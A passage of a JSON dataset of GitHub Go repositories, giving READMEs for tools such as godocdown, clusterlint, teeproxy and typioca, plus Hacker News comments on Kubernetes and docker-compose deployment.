`http:///swagger/index.html?displayOperationId=true`.\n\nThe [API's unittesting](tests/test_API.py) may serve as an example how to make use of the API with python3 & pyswagger.\n\n## What is out of scope\n * Creating or removing WireGuard (wgX) interfaces.\n * Generation or application of any `iptables` or `nftables` rules.\n * Setting up or changing IP-addresses of the WireGuard interface on operating systems other than linux.\n * Importing private keys of an existing WireGuard setup.\n\n## Application stack\n\n * [Gin, HTTP web framework written in Go](https://github.com/gin-gonic/gin)\n * [go-template, data-driven templates for generating textual output](https://golang.org/pkg/text/template/)\n * [Bootstrap, for the HTML templates](https://getbootstrap.com/)\n * [JQuery, for some nice JavaScript effects ;)](https://jquery.com/)\n\n## License\n\n * MIT License. 
[MIT](LICENSE.txt) or https://opensource.org/licenses/MIT\n\n\nThis project was inspired by [wg-gen-web](https://github.com/vx3r/wg-gen-web).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "robertkrimen/godocdown", "link": "https://github.com/robertkrimen/godocdown", "tags": [], "stars": 508, "description": "Format package documentation (godoc) as GitHub friendly Markdown", "lang": "Go", "repo_lang": "", "readme": "# godocdown\n--\nCommand godocdown generates Go documentation in a GitHub-friendly Markdown\nformat.\n\n $ go get github.com/robertkrimen/godocdown/godocdown\n\n $ godocdown /path/to/package > README.markdown\n\n # Generate documentation for the package/command in the current directory\n $ godocdown > README.markdown\n\n # Generate standard Markdown\n $ godocdown -plain .\n\nThis program is targeted at providing nice-looking documentation for GitHub.\nWith this in mind, it generates GitHub Flavored Markdown\n(http://github.github.com/github-flavored-markdown/) by default. This can be\nchanged with the use of the \"plain\" flag to generate standard Markdown.\n\n### Install\n\n go get github.com/robertkrimen/godocdown/godocdown\n\n\n### Example\n\nhttp://github.com/robertkrimen/godocdown/blob/master/example.markdown\n\n### Usage\n\n -output=\"\"\n Write output to a file instead of stdout\n Write to stdout with -\n\n -template=\"\"\n The template file to use\n\n -no-template=false\n Disable template processing\n\n -plain=false\n Emit standard Markdown, rather than Github Flavored Markdown\n\n -heading=\"TitleCase1Word\"\n Heading detection method: 1Word, TitleCase, Title, TitleCase1Word, \"\"\n For each line of the package declaration, godocdown attempts to detect if\n a heading is present via a pattern match. If a heading is detected,\n it prefixes the line with a Markdown heading indicator (typically \"###\").\n\n 1Word: Only a single word on the entire line\n [A-Za-z0-9_-]+\n\n TitleCase: A line where each word has the first letter capitalized\n ([A-Z][A-Za-z0-9_-]\\s*)+\n\n Title: A line without punctuation (e.g. a period at the end)\n ([A-Za-z0-9_-]\\s*)+\n\n TitleCase1Word: The line matches either the TitleCase or 1Word pattern\n\n\n### Templating\n\nIn addition to Markdown rendering, godocdown provides templating via\ntext/template (http://golang.org/pkg/text/template/) for further customization.\nBy putting a file named \".godocdown.template\" (or one from the list below) in\nthe same directory as your package/command, godocdown will know to use the file\nas a template.\n\n # text/template\n .godocdown.markdown\n .godocdown.md\n .godocdown.template\n .godocdown.tmpl\n\nA template file can also be specified with the \"-template\" parameter\n\nAlong with the standard template functionality, the starting data argument has\nthe following interface:\n\n {{ .Emit }}\n // Emit the standard documentation (what godocdown would emit without a template)\n\n {{ .EmitHeader }}\n // Emit the package name and an import line (if one is present/needed)\n\n {{ .EmitSynopsis }}\n // Emit the package declaration\n\n {{ .EmitUsage }}\n // Emit package usage, which includes a constants section, a variables section,\n // a functions section, and a types section. In addition, each type may have its own constant,\n // variable, and/or function/method listing.\n\n {{ if .IsCommand }} ... 
{{ end }}\n // A boolean indicating whether the given package is a command or a plain package\n\n {{ .Name }}\n // The name of the package/command (string)\n\n {{ .ImportPath }}\n // The import path for the package (string)\n // (This field will be the empty string if godocdown is unable to guess it)\n\n--\n**godocdown** http://github.com/robertkrimen/godocdown\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "awalterschulze/gographviz", "link": "https://github.com/awalterschulze/gographviz", "tags": ["graphviz", "golang", "graphviz-dot-language", "go", "parse"], "stars": 508, "description": "Parses the Graphviz DOT language in golang", "lang": "Go", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "suifengqjn/videoWater", "link": "https://github.com/suifengqjn/videoWater", "tags": ["video", "watermarking", "watermark-image", "watermark-remover", "watermark", "video-cliper"], "stars": 508, "description": "\u89c6\u9891\u6279\u91cf\u5904\u7406, \u7801\u7387\u8bbe\u7f6e, \u683c\u5f0f\u8f6c\u6362, \u6dfb\u52a0\u5b57\u5e55, \u6dfb\u52a0\u6c34\u5370, \u6587\u5b57\u8dd1\u9a6c\u706f, \u53bb\u9664\u6c34\u5370, \u4fee\u6539\u5206\u8fa8\u7387, \u89c6\u9891\u526a\u88c1, \u500d\u901f\u64ad\u653e, \u89c6\u9891\u5206\u6bb5, \u89c6\u9891\u5408\u6210, \u89c6\u9891\u955c\u50cf, \u80cc\u666f\u97f3\u4e50, \u63d2\u5165\u80cc\u666f\u56fe\u7247, \u89c6\u9891\u9ad8\u65af\u6a21\u7cca, \u6a21\u7cca\u62d3\u8fb9, \u753b\u4e2d\u753b,\u5b57\u5e55,\u7ffb\u8bd1,\u5f71\u89c6\u89e3\u8bf4,\u5f71\u89c6\u6df7\u526a,\u6296\u97f3\u5e26\u8d27,\u89c6\u9891\u5168\u81ea\u52a8\u526a\u8f91,\u89c6\u9891\u6279\u91cf\u526a\u8f91", "lang": "Go", "repo_lang": "", "readme": "### Video Demo\n\nThe video introduces how to configure the parameters of each function, and how to use the software as a whole\n\n[1. Download, install, use and simple demo (must see)](https://www.bilibili.com/video/av84085197/)\n\n[2. Video format conversion](https://www.bilibili.com/video/av84090158/)\n\n[3. Change video frame rate and bit rate](https://www.bilibili.com/video/av84090567/)\n\n[4. Remove video title and trailer](https://www.bilibili.com/video/av84090675/)\n\n[5. Video trimming](https://www.bilibili.com/video/av84090816/)\n\n[6. Remove watermark from video](https://www.bilibili.com/video/av84093352/)\n\n[7. Video Mirror Production](https://www.bilibili.com/video/av84093482/)\n\n[8. Modify video resolution](https://www.bilibili.com/video/av84093628/)\n\n[9. Video compression](https://www.bilibili.com/video/av84093725/)\n\n[10. Text watermark and image watermark](https://www.bilibili.com/video/av84093826/)\n\n[11. Double speed playback](https://www.bilibili.com/video/av84093943/)\n\n[12. Add title and trailer](https://www.bilibili.com/video/av84094016/)\n\n[13. Pseudo-original parameter configuration recommendation](https://www.bilibili.com/video/av84094116/)\n\n[14. Batch watermark removal by cutting method](https://www.bilibili.com/video/av86108022)\n\n[15. Add scrolling text watermark]()\n\n[16. Add random background music]()\n\n[17. Stroke text](https://www.bilibili.com/video/BV1hk4y167sZ/)\n\n[20. 
Independent function: video segmentation](https://www.bilibili.com/video/av84094229/)\n\n\n\n### windows system use\n\nThis is the structure after software decompression\n\n![](https://github.com/suifengqjn/videoWater/blob/master/image/r_1.png?raw=true)\n\n* config.toml needs to configure the video operation\n* source software depends on tools, do not touch\n* video The videos that need to be processed are placed in this folder\n* vm.exe launcher\n\nThere is a switch for each operation in config.toml, which operation is not needed, just close it\n\nOperation example:\n\n![](https://github.com/suifengqjn/videoWater/blob/master/image/r_2.png?raw=true)\n\nScale now puts a video in the video directory, and the config.toml is also configured\nDouble-click vm.exe directly to open the program.\n\n![](https://github.com/suifengqjn/videoWater/blob/master/image/r_3.png?raw=true)\n\nAfter running, there will be a result folder under the video, and the processed video is in it\n\n\n### mac system use\n\nThe opening method of mac is different\n\nUse the terminal to enter the folder where the program is located\n\n![](https://github.com/suifengqjn/videoWater/blob/master/image/r_4.png?raw=true)\n\nrun the program\n`./vm`\n\nIf permission denied appears\nThen execute `chmod 777 vm`\n\nExecute `./vm` again", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "digitalocean/clusterlint", "link": "https://github.com/digitalocean/clusterlint", "tags": ["kubernetes", "linter", "best-practices", "hacktoberfest"], "stars": 507, "description": "A best practices checker for Kubernetes clusters. \ud83e\udd20", "lang": "Go", "repo_lang": "", "readme": "# Clusterlint\n\n[![CircleCI](https://circleci.com/gh/digitalocean/clusterlint.svg?style=svg)](https://circleci.com/gh/digitalocean/clusterlint)\n\nAs clusters scale and become increasingly difficult to maintain, clusterlint helps operators conform to Kubernetes best practices around resources, security and reliability to avoid common problems while operating or upgrading the clusters.\n\nClusterlint queries live Kubernetes clusters for resources, executes common and platform specific checks against these resources and provides actionable feedback to cluster operators. It is a non invasive tool that is run externally. Clusterlint does not alter the resource configurations.\n\n### Background\n\nKubernetes resources can be configured and applied in many ways. This flexibility often makes it difficult to identify problems across the cluster at the time of configuration. Clusterlint looks at live clusters to analyze all its resources and report problems, if any.\n\nThere are some common best practices to follow while applying configurations to a cluster like:\n\n- Namespace is used to limit the scope of the Kubernetes resources created by multiple sets of users within a team. Even though there is a default namespace, dumping all the created resources into one namespace is not recommended. It can lead to privilege escalation, resource name collisions, latency in operations as resources scale up and mismanagement of kubernetes objects. Having namespaces ensures that resource quotas can be enabled to keep track node, cpu and memory usage for individual teams.\n\n- Always specify resource requests and limits on pods: When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on. 
And when containers have their limits specified, contention for resources on a node can be handled in a specified manner.\n\nWhile there are problems that are common to clusters irrespective of the environment they are running in, the fact that different Kubernetes configurations (VMs, managed solutions, etc.) have different subtleties affect how workloads run. Clusterlint provides platform specific checks to identify issues with resources that cluster operators can fix to run in a specific environment.\n\nSome examples of such checks are:\n\n- On upgrade of a cluster on [DOKS](https://www.digitalocean.com/products/kubernetes/), the worker nodes' hostname changes. So, if a user's pod spec relies on the hostname to schedule pods on specific nodes, pod scheduling will fail after upgrade.\n\n*Please refer to [checks.md](https://github.com/digitalocean/clusterlint/blob/master/checks.md) to get some background on every check that clusterlint performs.*\n\n### Install\n\n```bash\ngo get github.com/digitalocean/clusterlint/cmd/clusterlint\n```\n\nThe above command creates the `clusterlint` binary in `$GOPATH/bin`\n\n### Usage\n\n```bash\nclusterlint list [options] // list all checks available\nclusterlint run [options] // run all or specific checks\n```\n\n### Running in-cluster\n\nBuild the docker image to run clusterlint from within a cluster by doing:\n\n```shell\ndocker build -t /clusterlint: .\ndocker push /clusterlint:\n```\n\nIf you're running clusterlint from within a Pod, you can use the `--in-cluster` flag to access the Kubernetes API from the Pod.\n\n```\nclusterlint --in-cluster run\n```\n\nHere's a simple example of CronJob definition to run clusterlint in the default namespace without RBAC : \n\n```yaml\napiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: clusterlint-cron\nspec:\n schedule: \"0 */1 * * *\"\n concurrencyPolicy: Replace\n failedJobsHistoryLimit: 3\n successfulJobsHistoryLimit: 1\n jobTemplate:\n spec:\n template:\n spec:\n containers:\n - name: clusterlint\n image: docker.io//clusterlint:\n command: ['/clusterlint', '--in-cluster', 'run']\n imagePullPolicy: IfNotPresent\n restartPolicy: Never\n```\n\nIf you're using RBAC, see [docs/RBAC.md](docs/RBAC.md).\n\n### Specific checks and groups\n\nAll checks that clusterlint performs are categorized into groups. A check can belong to multiple groups. This framework allows one to only run specific checks on a cluster. For instance, if a cluster is running on DOKS, then, running checks specific to AWS does not make sense. Clusterlint can blacklist aws related checks, if any while running against a DOKS cluster.\n\n```bash\nclusterlint run -g basic // runs only checks that are part of the basic group\nclusterlint run -G security // runs all checks that are not part of the security group\nclusterlint run -c default-namespace // runs only the default-namespace check\nclusterlint run -C default-namespace // exclude default-namespace check\n```\n\n### Disabling checks via Annotations\n\nClusterlint provides a way to ignore some special objects in the cluster from being checked. For example, resources in the kube-system namespace often use privileged containers. This can create a lot of noise in the output when a cluster operator is looking for feedback to improve the cluster configurations. In order to avoid such a situation where objects that are exempt from being checked, the annotation `clusterlint.digitalocean.com/disabled-checks` can be added in the resource configuration. 
The annotation takes in a comma separated list of check names that should be excluded while running clusterlint.\n\n```json\n\"metadata\": {\n \"annotations\": {\n \"clusterlint.digitalocean.com/disabled-checks\" : \"noop,bare-pods\"\n }\n}\n```\n\n### Building local checks\n\nSome individuals and organizations have Kubernetes best practices that are not\napplicable to the general community, but which they would like to check with\nclusterlint. If your check may be useful for *anyone* else, we encourage you to\nsubmit it to clusterlint rather than keeping it local. However, if you have a\ntruly specific check that is not appropriate for sharing with the broader\ncommunity, you can implement it using Go plugins.\n\nSee the [example plugin](example-plugin) for documentation on how to build a\nplugin. Please be sure to read the [caveats](example-plugin/README.md#caveats)\nand consider whether you really want to maintain a plugin.\n\nTo use your plugin with clusterlint, pass its path on the commandline:\n\n```console\n$ clusterlint --plugins=/path/to/plugin.so list\n$ clusterlint --plugins=/path/to/plugin.so run -c my-plugin-check\n```\n\n## Release\n\nTo release a new version of clusterlint, go to the actions page on GitHub, click on `Run workflow`.\nSpecify the new tag to create. Make sure the tag is prefixed with `v`.\n\nThe workflow does the following:\n\n- Checks out the source code from the default branch\n- Login with dockerhub credentials specified as secrets\n- Builds the docker image digitalocean/clusterlint:\n- Pushes digitalocean/clusterlint: to dockerhub\n- Builds binaries for all archs and computes sha256 sums for each binary\n- Creates release and tags the latest commit on the default branch with the input tag specified when workflow is triggered\n\n## Contributing\n\nContributions are welcome, in the form of either issues or pull requests. Please\nsee the [contribution guidelines](CONTRIBUTING.md) for details.\n\n## License\n\nCopyright 2022 DigitalOcean\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at:\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "chrislusf/teeproxy", "link": "https://github.com/chrislusf/teeproxy", "tags": [], "stars": 507, "description": null, "lang": "Go", "repo_lang": "", "readme": "teeproxy\n=========\n\n[![Docker Pulls](https://img.shields.io/docker/pulls/chrislusf/teeproxy.svg?maxAge=604800)](https://hub.docker.com/r/chrislusf/teeproxy/)\n\nA reverse HTTP proxy that duplicates requests.\n\nWhy you may need this?\n----------------------\n\nYou may have production servers running, but you need to upgrade to a new system. You want to run A/B test on both old and new systems to confirm the new system can handle the production load, and want to see whether the new system can run in shadow mode continuously without any issue.\n\nHow it works?\n-------------\n\nteeproxy is a reverse HTTP proxy. For each incoming request, it clones the request into 2 requests, forwards them to 2 servers. 
The results from server A are returned as usual, but the results from server B are ignored.\n\nteeproxy handles GET, POST, and all other http methods.\n\nBuild\n-------------\n\n```\ngo build\n```\n\nUsage\n-------------\n\n```\n ./teeproxy -l :8888 -a [http(s)://]localhost:9000 -b [http(s)://]localhost:9001 [-b [http(s)://]localhost:9002]\n```\n\n`-l` specifies the listening port. `-a` and `-b` are meant for system A and systems B. The B systems can be taken down or started up without causing any issue to the teeproxy.\n\n#### Configuring timeouts ####\n \nIt's also possible to configure the timeout to both systems\n\n* `-a.timeout int`: timeout in milliseconds for production traffic (default `2500`)\n* `-b.timeout int`: timeout in milliseconds for alternate site traffic (default `1000`)\n\n#### Configuring host header rewrite ####\n\nOptionally rewrite host value in the http request header.\n\n* `-a.rewrite bool`: rewrite for production traffic (default `false`)\n* `-b.rewrite bool`: rewrite for alternate site traffic (default `false`)\n \n#### Configuring a percentage of requests to alternate site ####\n\n* `-p float64`: only send a percentage of requests. The value is float64 for more precise control. (default `100.0`)\n\n#### Configuring HTTPS ####\n\n* `-key.file string`: a TLS private key file. (default `\"\"`)\n* `-cert.file string`: a TLS certificate file. (default `\"\"`)\n\n#### Configuring client IP forwarding ####\n\nIt's possible to write `X-Forwarded-For` and `Forwarded` header (RFC 7239) so\nthat the production and alternate backends know about the clients:\n\n* `-forward-client-ip` (default is false)\n\n#### Configuring connection handling ####\n\nBy default, teeproxy tries to reuse connections. This can be turned off, if the\nendpoints do not support this.\n\n* `-close-connections` (default is false)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bloznelis/typioca", "link": "https://github.com/bloznelis/typioca", "tags": ["cli", "terminal", "tui", "typing", "golang", "typingtest"], "stars": 507, "description": "Cozy typing speed tester", "lang": "Go", "repo_lang": "", "readme": "

# typioca

Minimal, terminal based typing speed tester.
\n\n> **Tapioca** (/\u02cct\u00e6pi\u02c8o\u028ak\u0259/) is a starch extracted from the storage roots of the cassava plant. Pearl tapioca is a common ingredient in Asian desserts...and sweet drinks such as **bubble tea**.\n\n![](https://github.com/bloznelis/typioca/blob/master/img/typioca.gif)\n\n## Features\n * Time or word/sentence count based typing speed tests\n * Proper WPM results based on https://www.speedtypingonline.com/typing-equations\n * Multiple word/sentence lists made out of classical books to spice your test up\n * Cursor aware word lines\n * Interactive menu\n * ctrl+w support\n * SSH server `typioca serve`\n * Dynamic word lists\n * Custom word lists\n * Linux/Mac/Win support\n\n## Installation\n\n### AUR\n\n```\nyay -S typioca-git\n```\n\n### Go\n\n```\ngo install github.com/bloznelis/typioca@latest\n```\n\n**Note:** This will install typioca in `$GOBIN`, which defaults to `$GOPATH/bin` or `$HOME/go/bin` if the GOPATH environment variable is not set.\n\n### Homebrew\n\n```\nbrew tap bloznelis/tap\nbrew install typioca\n```\n\n### Scoop\n\n```\nscoop bucket add extras\nscoop install typioca\n```\n\n### Void Linux\n\n```\nxbps-install typioca\n```\n\n### Winget\n\n```\nwinget install bloznelis.typioca\n```\n\n### Building from source\n 1. Checkout the code\n 2. `make build`\n 3. `./execs/typioca`\n\n#### Prerequisites\n * `make`\n * `go`\n\n## Custom wordlists\n1. Create your word list in the same JSON format as the official ones [example](https://raw.githubusercontent.com/bloznelis/typioca/master/words/storage/words/common-english.json).\n - **Note:** for new-line separated word lists (like [this one](https://raw.githubusercontent.com/powerlanguage/word-lists/master/1000-most-common-words.txt)), for your convenience, you can use [this Clojure script](https://github.com/bloznelis/typioca/blob/master/words/common-word-list.clj). Explanation how to use it can be found [here](https://github.com/bloznelis/typioca/tree/master/words).\n3. Place your configuration to platform specific location:\n\n| Platform | **User configuration** |\n|----------|--------------------------------------------------------------------------------------------|\n| Windows | `%APPDATA%\\typioca\\typioca.conf` or `C:\\Users\\%USER%\\AppData\\Roaming\\typioca\\typioca.conf` |\n| Linux | `$XDG_CONFIG_HOME/typioca/typioca.conf` or `$HOME/.config/typioca/typioca.conf` |\n| macOS | `$HOME/Library/Application Support/typioca/typioca.conf` |\n\nConfig example (it is [TOML](https://github.com/toml-lang/toml)):\n```toml\n[[words]]\n name = \"Best hits '22\"\n enabled = false\n sentences = false\n path = \"/home/words/best-hits-22.json\"\n[[words]]\n name = \"Even better hits '23\"\n enabled = true\n sentences = false\n path = \"/home/words/better-hits-23.json\"\n```\n3. 
Use your words!\n![ship it](https://user-images.githubusercontent.com/33397865/176735281-5c2b34cb-5b19-43c1-9954-92c0583c4cc5.png)\n\n**Note:** Notice that custom wordlist controls are greyed-out, personal configuration must be handled via the file only.\n\n---\n![1](https://user-images.githubusercontent.com/33397865/176732388-11b66a1e-1d20-420f-a583-5d95241444d6.png)\n![3](https://user-images.githubusercontent.com/33397865/176732403-9c64e277-f533-4bf3-96a5-a26303b37b60.png)\n![2](https://user-images.githubusercontent.com/33397865/176732395-73c6c922-6a0d-4576-90bb-1f77e2c9b065.png)\n![4](https://user-images.githubusercontent.com/33397865/176732415-aac89b54-15d3-4b10-8408-fac997b97085.png)\n\n### Acknowledgments\nBuilt with [bubbletea](https://github.com/charmbracelet/bubbletea)\n\n\ud83e\uddcb\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes/api", "link": "https://github.com/kubernetes/api", "tags": ["k8s-staging"], "stars": 506, "description": "The canonical location of the Kubernetes API definition.", "lang": "Go", "repo_lang": "", "readme": "# api\n\nSchema of the external API types that are served by the Kubernetes API server.\n\n## Purpose\n\nThis library is the canonical location of the Kubernetes API definition. Most likely interaction with this repository is as a dependency of client-go.\n\nIt is published separately to avoid diamond dependency problems for users who\ndepend on more than one of `k8s.io/client-go`, `k8s.io/apimachinery`,\n`k8s.io/apiserver`...\n\n## Recommended Use\n\nWe recommend using the go types in this repo. You may serialize them directly to\nJSON.\n\nIf you want to store or interact with proto-formatted Kubernetes API objects, we\nrecommend using the \"official\" serialization stack in `k8s.io/apimachinery`.\nDirectly serializing these types to proto will not result in data that matches\nthe wire format or is compatible with other kubernetes ecosystem tools. The\nreason is that the wire format includes a magic prefix and an envelope proto.\nPlease see:\nhttps://kubernetes.io/docs/reference/using-api/api-concepts/#protobuf-encoding\n\nFor the same reason, we do not recommend embedding these proto objects within\nyour own proto definitions. It is better to store Kubernetes objects as byte\narrays, in the wire format, which is self-describing. This permits you to use\neither JSON or binary (proto) wire formats without code changes. It will be\ndifficult for you to operate on both Custom Resources and built-in types\notherwise.\n\n## Compatibility\n\nBranches track Kubernetes branches and are compatible with that repo.\n\n## Where does it come from?\n\n`api` is synced from https://github.com/kubernetes/kubernetes/blob/master/staging/src/k8s.io/api. Code changes are made in that location, merged into `k8s.io/kubernetes` and later synced here.\n\n## Things you should *NOT* do\n\n1. https://github.com/kubernetes/kubernetes/blob/master/staging/src/k8s.io/api is synced to k8s.io/api. All changes must be made in the former. The latter is read-only.\n\n\n", "readme_type": "markdown", "hn_comments": "Amazon publishing a blog that blatantly argues for vendor lock-in? Who would have guessed?One of the big benefits of Kubernetes is the cloud-agnostic API for running pretty much any application. 
CustomResources can help blur that boundary and make it easier to use some managed services, but actually arguing in favor of that approach for everything is a pure advertising tactic.It's no secret that managed services are several times more expensive than equivalent EC2 time. Sometimes it's worth it. But to throw Kubernetes into the mix just to run some controllers that deploy those services will pointlessly add to your monthly bill. Running any Kubernetes cluster is not cheap, even if it's just a bunch of controllers.There has been a lot of prior work in this space. There's crossplane, the Terraform Operator, and a ton of roll-your-own solutions for tackling this vary problem. Alibaba also was early to have the concept of a 'virtual node' where you can deploy seemingly infinite number of pods, they'll handle all the orchestration below.I was reading the article thinking \"Yes, finally, some code or use to implement interacting with AWS without a 3rd party lib\" and then I got to this section at the bottom:> In this post, we showed you the flexibility of Kubernetes. It\u2019s arguably an extreme option and one that doesn\u2019t even exist today (the Amazon ECS ACK controller isn\u2019t available but please thumb up this roadmap proposal if you are intrigued). If anything, it proves that Kubernetes can be a lot of things to a lot of different people and defining it remains a work in progress (at least in my head).As usual, Amazon is playing catch-up in actually orchestrating their services in a non-AWS-centric way. Very deceptive to create a blog post and not disclose it's not real software at the end.The last one (Kubernetes is my control plane but not my data plane) is completely stupid. Instead of that why not use terraform or equivalents ?Paying for EKS just to use its API to provision and manage other AWS resources is an interesting idea, but not something I'd use in production.> What is kubernetes?For me it's a platform to deploy apps without tying myself into a particular vendor.I love how conveniently on-premise kubernetes is missing. Or self-managed in the cloud.The whole point of kubernetes is to not think about your servers anymore because they in essence can be replaced at any time. This would only provide absolute vendor lock-in.Of course you can use any external service there is (like a database) but you should never put all your eggs into one basked and trust only one hoster. The principle remains the same: its just someone elses computer.Storage and networking are solved in a lot of places at a fraction of the cost and that is really just the beginning., but also the whole point of the exercise: to be able to move your workloads from wherever to wherever> Like in the past, when we used to store logic inside databases, using triggers and stored procedures. And now we know this kind of architecture can lead to problems related to performance, scale, and vendor lock-in.Many people use these database features quite well & suffer no problems. Doing things has risk. We have to keep interpetting _ deciding what risks, pro's/con's there are.It's a long read/rant, but I recommend Steve Yegge's Notes from the Mystery Machine Bus, where he talks about the political alignment of engineers into conservative or progressive positions. 
He's not totally right about his own opinions- turns out static typing has a lot of upsides, or at least, we havent made an IDE that can give us autocomplete as good without it- but the framing, the way of considering how we accept or reject ideas around us is capital.I see a lot of fear in this post. And it seems like an interesting premise. But I'd need a lot more to go on to start seeing the problem. Autonomic systems have a big risk of going wrong & there being no one in the room who understands, who can dive in & see the operator work: that to me is the chief risk; the de-skilling they enable. Maybe in some ways that mirrors problems stored procedures had. But operators are also capable of having really good observability, of really saying what they're doing and why, and that is the perfect counter, is bringing the light of understanding to the darker systems. Where-as the database has rarely been a good debuggable rich-context world.Woah, alright! This is what I've been waiting for. Thanks for building this... I can't wait to test it out!> Using container orchestration tools like Kubernetes or Nomad is usually an overkill for projects that will do fine with a single-server Docker Compose setup.Couldn't agree more! Very nice!Docker compose is great, I use it a lot for local development and testing of distributed systems. With a few tweaks you can simulate almost anything in containers including systemd and low-level networking stuff, which e.g. makes simulating an entire Ansible based setup trivial.Too bad Docker doesn't seem to push this much, with a bit of extra work this probably could be the deployment platform for 95 % of all software systems.Awesome! I might use this.I think this approach should work fine with https://github.com/lucaslorentz/caddy-docker-proxy as well.Is a single node k3s overkill? I don't think so. Once you outgrow it, you can port your deployments to a real k8s cluster.I just did a quick search for how to achieve a basic no-downtime deploy with Podman. It turns out it is not that hard [0]. Not sure how to do this if pods or containers are managed as systemd services, though.[0] https://github.com/evolutics/zero-downtime-deployments-with-...Dokku Maintainer here.This is pretty neat. One of my gripes about docker-compose - and a major why I've been hesitant to add support for it - is that the updates are not zero-downtime. That makes it much more annoying to use for app deploys as you either have to rewrite the compose command as a docker command (defeating part of the purpose of a compose file) or accept the downtime during a deploy. I'll definitely be including this tool (or something like it) with Dokku once I actually add compose support.Combining this with either Caddy Docker Proxy[1] or Traefik[2] could be quite nice for a very simple app deployment system.Would be super awesome for this functionality to land in the official `compose` plugin, but for now this is a great way to dip your toes into app deployments without too much overhead.There is a small island of productivity tools around docker-compose that would be super nice to build, and it's nice to see something like this land :) - https://github.com/lucaslorentz/caddy-docker-proxy\n - https://doc.traefik.io/traefik/providers/docker/This is great to see - fills the biggest hole in Docker Compose.I built something similar, it was a bit fragile though. 
What I ended up using instead was a lot simpler with only a little downside: Caddy for a reverse proxy will buffer requests when the downstream is down, unlike Nginx (which we used before). So during a deploy nobody gets any errors, just a brief 2s delay while the new service boots up. Seamless enough for me.If you are only running on a single node, it doesn't sound like downtime is a big concern regardless?UrghInterestingly, it looks like DHH is working on something similar (for Rails): https://github.com/mrsked/mrsk> MRSK deploys web apps in containers to servers running Docker with zero downtime. It uses the dynamic reverse-proxy Traefik to hold requests while the new application container is started and the old one is stopped. It works seamlessly across multiple hosts, using SSHKit to execute commands.thanks , have been looking a simple solution for thisDocker has some serious flaws with respect to app health and doing something about it when it's unhealthy.Just look at this PR that is 3years old and counting:\nhttps://github.com/moby/moby/issues/28400>> as it's not possible to run multiple containers with the same name or port mapping.I think you can :)What's wrong with Docker swarm mode? It already supports stacks and blue/green deployments.Doesn't this represent reinventing the wheel?FWIW I have discovered a simple technique that solves this problem without any additional software: I create two or more services that are identical in all but name, so instead of a `backend` service I'll have `backend1`, `backend2` etc.When I need to restart the service, I do it in a staggered fashion, first stop and restart `backend1`, wait a few seconds, then stop and restart `backend2` etc. I put this in a script, works without any problem.so a blue-green deployment for docker-compose, neatAFAIK nginx-proxy does not enable true zero-downtime. Thus using this tool with nginx-proxy does not enable zero-downtime.Example.Deployment goes like this:1) 2 app versions are deployed - blue (vCurrent) and green (vNext); both are up and ready to handle connections2) We are about to shut down blue and replace it with green3) Blue is handling long-running http request; receives shutdown signal; keeps handling long-running request, but does not accept new connections from now on4) because it is still active (nginx-proxy wont remove it), blue will still receive connections from nginx-proxy, and all of them will fail because of reasons stated in (3)\nConnections routed to green will succeed;\nThis is where zero-downtime fails.5) Once long running request is handled, and blue removed from docker, only then nginx-proxy refreshes its configuration and routes all traffic to green.If i am correct, this tool solves issue where non-working container are configured to receive traffic by nginx-proxy, but does not solve issue where partially shutdown old container still receices traffic and drops it.I dont know about caddy-docker-proxy.Isn't that functionality already buried somewhere between Docker Stack and Docker Swarm?Awesome, I was looking for something just like this the other day. I\u2019ll be checking this out!I did something similar using git hooks (for Heroku-like deployments) and curl for health-checking the app [0]. In my case, instead of using replicas, I created multiple services in the docker-compose.yaml file. The services are the same but with different names (e.g: app1 and app2). 
Then, during deployment I can update only app1, run the health checks, then update app2 if everything is ok.[0]: https://ricardoanderegg.com/posts/git-push-deployments-docke...[dead]https://dockerswarm.rocks/Bunnyshell.com has a remote development feature that works like this:\n- environments are deployed to you Kubernetes cluster (via bunnyshell) \n- developers edit files locally (on their laptops) in any IDE/editor they wish\n- code is synced in real-time to the cloud envSo devs write code locally, but it runs remotely, in the cloud, in a complete environments.Also, ephemeral environments are available ( create/destroy env on PR open/close).Disclosure: I work @BunnyshellI have been managing team servers for a while, in most of the cases, a server was required to:1. Running experiments, like trying tools before committing to integrating them in our project.2. Run a tool that would simplify local development setup, in most cases, running a backend or a database.3. Try a preview from our applications in a cloud environment.For the 1st case a single shared server for experiments has worked fine, I guess this would depend on each team.For the 2nd case, we'd usually create a server specific for the tool and share the access with devs requiring it.For the 3rd case, it got a bit more complicated because there are times where many devs what to push a preview, requiring coordination between devs which is tedious and error-prone. At the end, we took your route and we ended up building our own service to provide fullstack preview environments automatically when pushing code to our repository, so far, it has removed the need to share servers with devs for most scenarios.Can't you use NixOS for this stuff? I think it's the main selling point of NixOS that every developer has the same environment. You may also deploy those nix environments via terraform.Before tooling even comes into the equation, you owe it to yourself and your sanity to read this in full: http://blog.lusis.org/blog/2016/05/15/so-you-wanna-go-onprem...Here be dragons.At some smaller companies I have worked at we used Terraform and Helm for everything. We had a strict policy that anything beyond dev had to be deployed by a robot owned by our security operations team. We already had multiple test and staging environments so that developers can remain unblocked. When an enterprise customer required a dedicated instance we created an additional set of environments from our existing templates.The environments looked like:\n - platformcodename-$customerid-test0\n - platformcodename-$customerid-test1\n - 